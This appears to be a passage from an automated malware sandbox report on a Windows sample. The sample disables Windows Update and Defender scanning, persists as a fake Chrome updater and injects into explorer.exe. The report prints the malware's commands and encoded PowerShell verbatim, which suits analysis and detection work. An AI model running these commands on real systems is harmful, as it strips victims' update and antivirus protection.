REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
- Modifies security service
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAxADEALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB4AGoAZABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBsAG8AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="4⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe86d946f8,0x7ffe86d94708,0x7ffe86d947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5516 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5756 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x1fc,0x200,0x7ff62dad5460,0x7ff62dad5470,0x7ff62dad54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5908 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3252 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6360 /prefetch:23⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
